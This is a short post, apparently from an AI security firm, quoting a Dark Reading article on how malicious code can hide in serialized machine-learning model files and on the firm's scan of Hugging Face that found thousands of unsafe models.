Dark Reading mentioned us when discussing spotting attacks through AI models -
"Typically, models are saved as Pickle files by Scikit-Learn (.pkl) and PyTorch (.pt), and as the Hierarchical Data Format version 5 (HDF5) files often used by Keras and TensorFlow. Unfortunately, these file formats can contain executable code and often have insecure serialization functions that are prone to vulnerabilities. In both cases, an attacker could attack the machines on which the model is run, says Diana Kelley, chief information security officer at Protect AI, an AI application security firm.
"Because of the way that models work, they tend to run with very high privilege within an organization, so they have a lot of access to things because they have to touch or get input from data sources," she says. "So if you can put something malicious into a model, then that would be a very viable attack."
Hugging Face, for example, now boasts more than 540,000 models, up from less than 100,000 at the end of 2022. Protect AI scanned Hugging Face and found 3,354 unsafe models — about 1,350 that were missed by Hugging Face's own scanner, the company stated in January."